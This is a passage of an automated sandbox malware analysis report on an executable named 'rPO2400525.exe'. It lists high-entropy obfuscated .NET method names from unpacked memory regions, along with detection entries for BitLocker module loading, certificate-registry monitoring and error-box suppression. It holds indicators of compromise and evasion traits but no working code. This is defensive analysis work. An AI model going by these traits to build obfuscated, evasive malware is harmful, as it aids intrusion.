                Source: 0.2.rPO2400525.exe.400f670.2.raw.unpack, uqcWmDxK2RTnDoC0Fe.csHigh entropy of concatenated method names: 'YEWdQQadln', 'WDjdwHO39f', 'UgYdpp5dhv', 'xjtdl9imtF', 'zAodMKEICr', 'QE6dSWdClX', 'e55Lm6Brca9hMiqNsV', 'ABGDC8wsEN3q58LpWm', 'ewTddTVdRo', 'Ej8dZ0Meuy'
                Source: 0.2.rPO2400525.exe.400f670.2.raw.unpack, IK9F1N2fUYNiLES1HN.csHigh entropy of concatenated method names: 'ravk7mODpq', 'KHJkU54ya6', 'cBZkg1dkb0', 'YyJkO6yqNI', 'IrPk144MXq', 'WWtk56kGyW', 'dJtkH6xnT0', 'wUpk4EsC18', 'xYkkYkcdKV', 'gNukEvYKWk'
                Source: 0.2.rPO2400525.exe.400f670.2.raw.unpack, BQadlnmLDjHO39f8Fa.csHigh entropy of concatenated method names: 'pywfa0uwAZ', 'JqdfrHYAxY', 'bjQfP9PEQU', 'ukMfBUfBWO', 'PXJfJbTdZN', 'f25fukSCTd', 'BfGfLkfopa', 'jRQftUoehY', 'XSRf2fu90v', 'a79fIUqkuN'
                Source: 0.2.rPO2400525.exe.400f670.2.raw.unpack, W5vsRJjgYp5dhv3jt9.csHigh entropy of concatenated method names: 'u43vTwLW1a', 'VAnvApJXbu', 'syOvmn6OLO', 'rnhvjFQF0x', 'oGKvMhmYp4', 'zUJvSUK5Ny', 'djIvN2bQ36', 'hVavGaNQpb', 'bC2vkkxEJH', 'TC4vnEljkr'
                Source: 0.2.rPO2400525.exe.400f670.2.raw.unpack, fITsPGCclECbKn2Anm.csHigh entropy of concatenated method names: 'CZ4omHkYT9', 'UprojMq6kE', 'tJAo733jYW', 'XI4oUgPlEg', 'FHSoOPFsXw', 'C3Ko1KFuY7', 'NeroHaAb15', 'Y3ao4ZMxEs', 'EDboE5pSPW', 'z4eoXdT0Vi'
                Source: 0.2.rPO2400525.exe.400f670.2.raw.unpack, PdtvdfYUwTWmPyvkVM.csHigh entropy of concatenated method names: 'up9QsuiyFG', 'k0RQRwiLDZ', 'BMVQKrMQ9W', 'tmZQTEICUg', 'fYUQWhyYLC', 'YQyQAp4alr', 'YJFQFnoNNv', 'pWJQmPrlaQ', 'PUyQj6xQiK', 'W06QqS9rFr'
                Source: 0.2.rPO2400525.exe.400f670.2.raw.unpack, rx779KyfXyPA4V7nik.csHigh entropy of concatenated method names: 'FA3Kvrler', 'JI2TP1Zum', 'YIWA5l60Z', 'v8tFuvBNQ', 'AqIjt1GAJ', 'pYCqsITCw', 'dOfledX2RQM4EgSYv9', 'BJNnU55YwsBberRp4w', 'Yc4mI8CPL632kiWm8X', 'UiRGpON4W'
                Source: 0.2.rPO2400525.exe.400f670.2.raw.unpack, t1NaILdyZBBFZU8pqRQ.csHigh entropy of concatenated method names: 'ToString', 'X836mNPCnS', 'F2W6jnqYRc', 'gRj6q3niLx', 'RKH67uSyDU', 'HXh6UywbN9', 'hXm6gGBg1k', 'GbX6OuYOGD', 'AhCLoB8M74fa2Ju7Fbw', 'J0Q0CR8sNwpa4ZCyQVW'
                Source: 0.2.rPO2400525.exe.400f670.2.raw.unpack, f4QJT9wb5LajnPRhVM.csHigh entropy of concatenated method names: 'JdXZDmc3yT', 'fOaZ0xeYyB', 'yOfZfObxr9', 'QjEZvGCYEE', 'XKTZ9ZLY0w', 'CRMZVDiqCA', 'BKYZQC82hI', 'tdKZwqDETo', 'IjeZ88opB0', 'z8CZpBMo9L'
                Source: 0.2.rPO2400525.exe.400f670.2.raw.unpack, JFs7aKL782U3eANt9o.csHigh entropy of concatenated method names: 'ifAkMvclZe', 'cVukNCvoxG', 'M3akkOL4bc', 'CQak64OCJI', 'O93kemZRDy', 'jOpk3bAoN0', 'Dispose', 'Yo3G0QVQMB', 'qOPGf9bAvk', 'C5GGvmFFsi'
                Source: 0.2.rPO2400525.exe.400f670.2.raw.unpack, cJ4Zjydd7bKydcPZNVK.csHigh entropy of concatenated method names: 'di1nI4ZnhC', 'Q3lnzuebPB', 'mlh6hMW5bY', 'mPb6ducdvr', 'qqN6yBsFl6', 'SXC6ZA45Dw', 'm4I6xGtbd2', 'AwA6D80Zam', 's1k600eH1q', 'uiB6fEBBRK'
                Source: 0.2.rPO2400525.exe.400f670.2.raw.unpack, XmHcvvITaPtJ9TGC9k.csHigh entropy of concatenated method names: 'nLHnv99ODY', 'bNvn9e1Ds7', 'rr1nVJqDa1', 'VNsnQETaov', 'CdGnkCorWC', 'FQ8nwnC7qU', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.rPO2400525.exe.400f670.2.raw.unpack, SoMUnDa1l5q0UZYjMQ.csHigh entropy of concatenated method names: 'MHxMEGZinA', 'm9DMiArTRb', 'TvPMaotBGy', 'xxUMr0p4rY', 'IcTMUyp3L9', 'VHQMgfYP2v', 'MHlMOcbnhI', 'J1LM1RV8PZ', 'UdeM5e30E6', 'QhqMHSNpa8'
                Source: 0.2.rPO2400525.exe.400f670.2.raw.unpack, IfeYct5GqX3EA1vWQs.csHigh entropy of concatenated method names: 'sIbVP8C4pD', 'VldVBeWGum', 'SjpVJVjxOK', 'ToString', 'L2IVuxi5OX', 'CcBVLKfdpr', 'h0QW0RN3cEf4mnu8NaU', 'GB3oOaNeuObiYMvK34Y', 'a7uX80NjtAK3Oj7WjHq'
                Source: 0.2.rPO2400525.exe.406b290.3.raw.unpack, QmNxRKPlC4gn0sRcV1.csHigh entropy of concatenated method names: 'ToString', 'bw0SXNhoQ3', 'WIdSUtCdR1', 'J5eSgJ7OLU', 'TkySObnk7V', 'jJ9S1dBQob', 'T8KS5rMKYC', 'oNjSHHk2tQ', 'dURS4GcK8t', 'fGwSYVjEO0'
                Source: 0.2.rPO2400525.exe.406b290.3.raw.unpack, FG6Wmpdx8ViBYnqLtyQ.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'fBIbkIZrpZ', 'xqGbnKnJxm', 'n5tb6Q6CLd', 'AZ6bbXSAqA', 'cdtbeK5d7a', 'pRNbcAqZKk', 'vSsb3s929c'
                Source: 0.2.rPO2400525.exe.406b290.3.raw.unpack, WGBtAgu9e8eGuUqGon.csHigh entropy of concatenated method names: 'qnANtStUlO', 'bevNIaJQEG', 'OjXGhPGQt2', 'HSLGd9HndM', 'WXsNXdeVvq', 'iHuNiNcfGm', 'mIXNCeDwJD', 'vPVNat6Q87', 'R62NrrsKVJ', 'asZNPTGkmw'
                Source: 0.2.rPO2400525.exe.406b290.3.raw.unpack, YCrCE67WdClXvvj9dJ.csHigh entropy of concatenated method names: 'XsJVDTo1H0', 'CY9VfeWKZN', 'WXKV9rTi3M', 'kRFVQwYBIY', 'vZcVwABdQb', 'wsL9JKpfgm', 'yoj9u7jgl0', 'igk9Ls31lQ', 'TrC9t2VqNT', 'm6e92AEDw8'
                Source: 0.2.rPO2400525.exe.406b290.3.raw.unpack, OERyRezUeySYGOwujG.csHigh entropy of concatenated method names: 'nmanAd7aKs', 'xLEnmPfYE5', 'MjenjmCDCV', 'E0Wn7RQEkB', 'XEInUnw8mC', 'u2SnOJy4nR', 'Qwdn1s8dpI', 'aG5n3pcErB', 'X1Sns7okiV', 'NvSnRj18l0'
                Source: 0.2.rPO2400525.exe.406b290.3.raw.unpack, KLxxx4fY9da11kemkF.csHigh entropy of concatenated method names: 'Dispose', 'YU3d2eANt9', 'gdnyUga15H', 'TJbbJkH4nH', 'nCadIPBu6f', 'fUtdzAYyDQ', 'ProcessDialogKey', 'tcgyhK9F1N', 'fUYydNiLES', 'JHNyy2mHcv'
                Source: 0.2.rPO2400525.exe.406b290.3.raw.unpack, KVRbeMHT26Q3AmdiFs.csHigh entropy of concatenated method names: 'RlsQ05ttxG', 'KncQvLDES8', 'zcrQVc0yXB', 'DiQVI7jZF5', 'rBsVzo9YqY', 'LNLQhC7jcf', 'BuGQdgHpwY', 'FuKQyOdaea', 'HGYQZ53xF8', 'CDfQx4FMp0'
                Source: 0.2.rPO2400525.exe.406b290.3.raw.unpack, UoInSmdhbkUxcqdcNvi.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'zkLnXEwfxy', 'TjlniA9AN7', 'pwOnC5aH5q', 'pSIna9yCul', 'Kltnr92Gaq', 'z1rnPXg5Ju', 'b6rnBuk86v'
                Source: 0.2.rPO2400525.exe.406b290.3.raw.unpack, uqcWmDxK2RTnDoC0Fe.csHigh entropy of concatenated method names: 'YEWdQQadln', 'WDjdwHO39f', 'UgYdpp5dhv', 'xjtdl9imtF', 'zAodMKEICr', 'QE6dSWdClX', 'e55Lm6Brca9hMiqNsV', 'ABGDC8wsEN3q58LpWm', 'ewTddTVdRo', 'Ej8dZ0Meuy'
                Source: 0.2.rPO2400525.exe.406b290.3.raw.unpack, IK9F1N2fUYNiLES1HN.csHigh entropy of concatenated method names: 'ravk7mODpq', 'KHJkU54ya6', 'cBZkg1dkb0', 'YyJkO6yqNI', 'IrPk144MXq', 'WWtk56kGyW', 'dJtkH6xnT0', 'wUpk4EsC18', 'xYkkYkcdKV', 'gNukEvYKWk'
                Source: 0.2.rPO2400525.exe.406b290.3.raw.unpack, BQadlnmLDjHO39f8Fa.csHigh entropy of concatenated method names: 'pywfa0uwAZ', 'JqdfrHYAxY', 'bjQfP9PEQU', 'ukMfBUfBWO', 'PXJfJbTdZN', 'f25fukSCTd', 'BfGfLkfopa', 'jRQftUoehY', 'XSRf2fu90v', 'a79fIUqkuN'
                Source: 0.2.rPO2400525.exe.406b290.3.raw.unpack, W5vsRJjgYp5dhv3jt9.csHigh entropy of concatenated method names: 'u43vTwLW1a', 'VAnvApJXbu', 'syOvmn6OLO', 'rnhvjFQF0x', 'oGKvMhmYp4', 'zUJvSUK5Ny', 'djIvN2bQ36', 'hVavGaNQpb', 'bC2vkkxEJH', 'TC4vnEljkr'
                Source: 0.2.rPO2400525.exe.406b290.3.raw.unpack, fITsPGCclECbKn2Anm.csHigh entropy of concatenated method names: 'CZ4omHkYT9', 'UprojMq6kE', 'tJAo733jYW', 'XI4oUgPlEg', 'FHSoOPFsXw', 'C3Ko1KFuY7', 'NeroHaAb15', 'Y3ao4ZMxEs', 'EDboE5pSPW', 'z4eoXdT0Vi'
                Source: 0.2.rPO2400525.exe.406b290.3.raw.unpack, PdtvdfYUwTWmPyvkVM.csHigh entropy of concatenated method names: 'up9QsuiyFG', 'k0RQRwiLDZ', 'BMVQKrMQ9W', 'tmZQTEICUg', 'fYUQWhyYLC', 'YQyQAp4alr', 'YJFQFnoNNv', 'pWJQmPrlaQ', 'PUyQj6xQiK', 'W06QqS9rFr'
                Source: 0.2.rPO2400525.exe.406b290.3.raw.unpack, rx779KyfXyPA4V7nik.csHigh entropy of concatenated method names: 'FA3Kvrler', 'JI2TP1Zum', 'YIWA5l60Z', 'v8tFuvBNQ', 'AqIjt1GAJ', 'pYCqsITCw', 'dOfledX2RQM4EgSYv9', 'BJNnU55YwsBberRp4w', 'Yc4mI8CPL632kiWm8X', 'UiRGpON4W'
                Source: 0.2.rPO2400525.exe.406b290.3.raw.unpack, t1NaILdyZBBFZU8pqRQ.csHigh entropy of concatenated method names: 'ToString', 'X836mNPCnS', 'F2W6jnqYRc', 'gRj6q3niLx', 'RKH67uSyDU', 'HXh6UywbN9', 'hXm6gGBg1k', 'GbX6OuYOGD', 'AhCLoB8M74fa2Ju7Fbw', 'J0Q0CR8sNwpa4ZCyQVW'
                Source: 0.2.rPO2400525.exe.406b290.3.raw.unpack, f4QJT9wb5LajnPRhVM.csHigh entropy of concatenated method names: 'JdXZDmc3yT', 'fOaZ0xeYyB', 'yOfZfObxr9', 'QjEZvGCYEE', 'XKTZ9ZLY0w', 'CRMZVDiqCA', 'BKYZQC82hI', 'tdKZwqDETo', 'IjeZ88opB0', 'z8CZpBMo9L'
                Source: 0.2.rPO2400525.exe.406b290.3.raw.unpack, JFs7aKL782U3eANt9o.csHigh entropy of concatenated method names: 'ifAkMvclZe', 'cVukNCvoxG', 'M3akkOL4bc', 'CQak64OCJI', 'O93kemZRDy', 'jOpk3bAoN0', 'Dispose', 'Yo3G0QVQMB', 'qOPGf9bAvk', 'C5GGvmFFsi'
                Source: 0.2.rPO2400525.exe.406b290.3.raw.unpack, cJ4Zjydd7bKydcPZNVK.csHigh entropy of concatenated method names: 'di1nI4ZnhC', 'Q3lnzuebPB', 'mlh6hMW5bY', 'mPb6ducdvr', 'qqN6yBsFl6', 'SXC6ZA45Dw', 'm4I6xGtbd2', 'AwA6D80Zam', 's1k600eH1q', 'uiB6fEBBRK'
                Source: 0.2.rPO2400525.exe.406b290.3.raw.unpack, XmHcvvITaPtJ9TGC9k.csHigh entropy of concatenated method names: 'nLHnv99ODY', 'bNvn9e1Ds7', 'rr1nVJqDa1', 'VNsnQETaov', 'CdGnkCorWC', 'FQ8nwnC7qU', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.rPO2400525.exe.406b290.3.raw.unpack, SoMUnDa1l5q0UZYjMQ.csHigh entropy of concatenated method names: 'MHxMEGZinA', 'm9DMiArTRb', 'TvPMaotBGy', 'xxUMr0p4rY', 'IcTMUyp3L9', 'VHQMgfYP2v', 'MHlMOcbnhI', 'J1LM1RV8PZ', 'UdeM5e30E6', 'QhqMHSNpa8'
                Source: 0.2.rPO2400525.exe.406b290.3.raw.unpack, IfeYct5GqX3EA1vWQs.csHigh entropy of concatenated method names: 'sIbVP8C4pD', 'VldVBeWGum', 'SjpVJVjxOK', 'ToString', 'L2IVuxi5OX', 'CcBVLKfdpr', 'h0QW0RN3cEf4mnu8NaU', 'GB3oOaNeuObiYMvK34Y', 'a7uX80NjtAK3Oj7WjHq'
                Source: 0.2.rPO2400525.exe.6b00000.6.raw.unpack, QmNxRKPlC4gn0sRcV1.csHigh entropy of concatenated method names: 'ToString', 'bw0SXNhoQ3', 'WIdSUtCdR1', 'J5eSgJ7OLU', 'TkySObnk7V', 'jJ9S1dBQob', 'T8KS5rMKYC', 'oNjSHHk2tQ', 'dURS4GcK8t', 'fGwSYVjEO0'
                Source: 0.2.rPO2400525.exe.6b00000.6.raw.unpack, FG6Wmpdx8ViBYnqLtyQ.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'fBIbkIZrpZ', 'xqGbnKnJxm', 'n5tb6Q6CLd', 'AZ6bbXSAqA', 'cdtbeK5d7a', 'pRNbcAqZKk', 'vSsb3s929c'
                Source: 0.2.rPO2400525.exe.6b00000.6.raw.unpack, WGBtAgu9e8eGuUqGon.csHigh entropy of concatenated method names: 'qnANtStUlO', 'bevNIaJQEG', 'OjXGhPGQt2', 'HSLGd9HndM', 'WXsNXdeVvq', 'iHuNiNcfGm', 'mIXNCeDwJD', 'vPVNat6Q87', 'R62NrrsKVJ', 'asZNPTGkmw'
                Source: 0.2.rPO2400525.exe.6b00000.6.raw.unpack, YCrCE67WdClXvvj9dJ.csHigh entropy of concatenated method names: 'XsJVDTo1H0', 'CY9VfeWKZN', 'WXKV9rTi3M', 'kRFVQwYBIY', 'vZcVwABdQb', 'wsL9JKpfgm', 'yoj9u7jgl0', 'igk9Ls31lQ', 'TrC9t2VqNT', 'm6e92AEDw8'
                Source: 0.2.rPO2400525.exe.6b00000.6.raw.unpack, OERyRezUeySYGOwujG.csHigh entropy of concatenated method names: 'nmanAd7aKs', 'xLEnmPfYE5', 'MjenjmCDCV', 'E0Wn7RQEkB', 'XEInUnw8mC', 'u2SnOJy4nR', 'Qwdn1s8dpI', 'aG5n3pcErB', 'X1Sns7okiV', 'NvSnRj18l0'
                Source: 0.2.rPO2400525.exe.6b00000.6.raw.unpack, KLxxx4fY9da11kemkF.csHigh entropy of concatenated method names: 'Dispose', 'YU3d2eANt9', 'gdnyUga15H', 'TJbbJkH4nH', 'nCadIPBu6f', 'fUtdzAYyDQ', 'ProcessDialogKey', 'tcgyhK9F1N', 'fUYydNiLES', 'JHNyy2mHcv'
                Source: 0.2.rPO2400525.exe.6b00000.6.raw.unpack, KVRbeMHT26Q3AmdiFs.csHigh entropy of concatenated method names: 'RlsQ05ttxG', 'KncQvLDES8', 'zcrQVc0yXB', 'DiQVI7jZF5', 'rBsVzo9YqY', 'LNLQhC7jcf', 'BuGQdgHpwY', 'FuKQyOdaea', 'HGYQZ53xF8', 'CDfQx4FMp0'
                Source: 0.2.rPO2400525.exe.6b00000.6.raw.unpack, UoInSmdhbkUxcqdcNvi.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'zkLnXEwfxy', 'TjlniA9AN7', 'pwOnC5aH5q', 'pSIna9yCul', 'Kltnr92Gaq', 'z1rnPXg5Ju', 'b6rnBuk86v'
                Source: 0.2.rPO2400525.exe.6b00000.6.raw.unpack, uqcWmDxK2RTnDoC0Fe.csHigh entropy of concatenated method names: 'YEWdQQadln', 'WDjdwHO39f', 'UgYdpp5dhv', 'xjtdl9imtF', 'zAodMKEICr', 'QE6dSWdClX', 'e55Lm6Brca9hMiqNsV', 'ABGDC8wsEN3q58LpWm', 'ewTddTVdRo', 'Ej8dZ0Meuy'
                Source: 0.2.rPO2400525.exe.6b00000.6.raw.unpack, IK9F1N2fUYNiLES1HN.csHigh entropy of concatenated method names: 'ravk7mODpq', 'KHJkU54ya6', 'cBZkg1dkb0', 'YyJkO6yqNI', 'IrPk144MXq', 'WWtk56kGyW', 'dJtkH6xnT0', 'wUpk4EsC18', 'xYkkYkcdKV', 'gNukEvYKWk'
                Source: 0.2.rPO2400525.exe.6b00000.6.raw.unpack, BQadlnmLDjHO39f8Fa.csHigh entropy of concatenated method names: 'pywfa0uwAZ', 'JqdfrHYAxY', 'bjQfP9PEQU', 'ukMfBUfBWO', 'PXJfJbTdZN', 'f25fukSCTd', 'BfGfLkfopa', 'jRQftUoehY', 'XSRf2fu90v', 'a79fIUqkuN'
                Source: 0.2.rPO2400525.exe.6b00000.6.raw.unpack, W5vsRJjgYp5dhv3jt9.csHigh entropy of concatenated method names: 'u43vTwLW1a', 'VAnvApJXbu', 'syOvmn6OLO', 'rnhvjFQF0x', 'oGKvMhmYp4', 'zUJvSUK5Ny', 'djIvN2bQ36', 'hVavGaNQpb', 'bC2vkkxEJH', 'TC4vnEljkr'
                Source: 0.2.rPO2400525.exe.6b00000.6.raw.unpack, fITsPGCclECbKn2Anm.csHigh entropy of concatenated method names: 'CZ4omHkYT9', 'UprojMq6kE', 'tJAo733jYW', 'XI4oUgPlEg', 'FHSoOPFsXw', 'C3Ko1KFuY7', 'NeroHaAb15', 'Y3ao4ZMxEs', 'EDboE5pSPW', 'z4eoXdT0Vi'
                Source: 0.2.rPO2400525.exe.6b00000.6.raw.unpack, PdtvdfYUwTWmPyvkVM.csHigh entropy of concatenated method names: 'up9QsuiyFG', 'k0RQRwiLDZ', 'BMVQKrMQ9W', 'tmZQTEICUg', 'fYUQWhyYLC', 'YQyQAp4alr', 'YJFQFnoNNv', 'pWJQmPrlaQ', 'PUyQj6xQiK', 'W06QqS9rFr'
                Source: 0.2.rPO2400525.exe.6b00000.6.raw.unpack, rx779KyfXyPA4V7nik.csHigh entropy of concatenated method names: 'FA3Kvrler', 'JI2TP1Zum', 'YIWA5l60Z', 'v8tFuvBNQ', 'AqIjt1GAJ', 'pYCqsITCw', 'dOfledX2RQM4EgSYv9', 'BJNnU55YwsBberRp4w', 'Yc4mI8CPL632kiWm8X', 'UiRGpON4W'
                Source: 0.2.rPO2400525.exe.6b00000.6.raw.unpack, t1NaILdyZBBFZU8pqRQ.csHigh entropy of concatenated method names: 'ToString', 'X836mNPCnS', 'F2W6jnqYRc', 'gRj6q3niLx', 'RKH67uSyDU', 'HXh6UywbN9', 'hXm6gGBg1k', 'GbX6OuYOGD', 'AhCLoB8M74fa2Ju7Fbw', 'J0Q0CR8sNwpa4ZCyQVW'
                Source: 0.2.rPO2400525.exe.6b00000.6.raw.unpack, f4QJT9wb5LajnPRhVM.csHigh entropy of concatenated method names: 'JdXZDmc3yT', 'fOaZ0xeYyB', 'yOfZfObxr9', 'QjEZvGCYEE', 'XKTZ9ZLY0w', 'CRMZVDiqCA', 'BKYZQC82hI', 'tdKZwqDETo', 'IjeZ88opB0', 'z8CZpBMo9L'
                Source: 0.2.rPO2400525.exe.6b00000.6.raw.unpack, JFs7aKL782U3eANt9o.csHigh entropy of concatenated method names: 'ifAkMvclZe', 'cVukNCvoxG', 'M3akkOL4bc', 'CQak64OCJI', 'O93kemZRDy', 'jOpk3bAoN0', 'Dispose', 'Yo3G0QVQMB', 'qOPGf9bAvk', 'C5GGvmFFsi'
                Source: 0.2.rPO2400525.exe.6b00000.6.raw.unpack, cJ4Zjydd7bKydcPZNVK.csHigh entropy of concatenated method names: 'di1nI4ZnhC', 'Q3lnzuebPB', 'mlh6hMW5bY', 'mPb6ducdvr', 'qqN6yBsFl6', 'SXC6ZA45Dw', 'm4I6xGtbd2', 'AwA6D80Zam', 's1k600eH1q', 'uiB6fEBBRK'
                Source: 0.2.rPO2400525.exe.6b00000.6.raw.unpack, XmHcvvITaPtJ9TGC9k.csHigh entropy of concatenated method names: 'nLHnv99ODY', 'bNvn9e1Ds7', 'rr1nVJqDa1', 'VNsnQETaov', 'CdGnkCorWC', 'FQ8nwnC7qU', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.rPO2400525.exe.6b00000.6.raw.unpack, SoMUnDa1l5q0UZYjMQ.csHigh entropy of concatenated method names: 'MHxMEGZinA', 'm9DMiArTRb', 'TvPMaotBGy', 'xxUMr0p4rY', 'IcTMUyp3L9', 'VHQMgfYP2v', 'MHlMOcbnhI', 'J1LM1RV8PZ', 'UdeM5e30E6', 'QhqMHSNpa8'
                Source: 0.2.rPO2400525.exe.6b00000.6.raw.unpack, IfeYct5GqX3EA1vWQs.csHigh entropy of concatenated method names: 'sIbVP8C4pD', 'VldVBeWGum', 'SjpVJVjxOK', 'ToString', 'L2IVuxi5OX', 'CcBVLKfdpr', 'h0QW0RN3cEf4mnu8NaU', 'GB3oOaNeuObiYMvK34Y', 'a7uX80NjtAK3Oj7WjHq'

                Hooking and other Techniques for Hiding and Protection

                barindex
                Loading BitLocker PowerShell Module
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
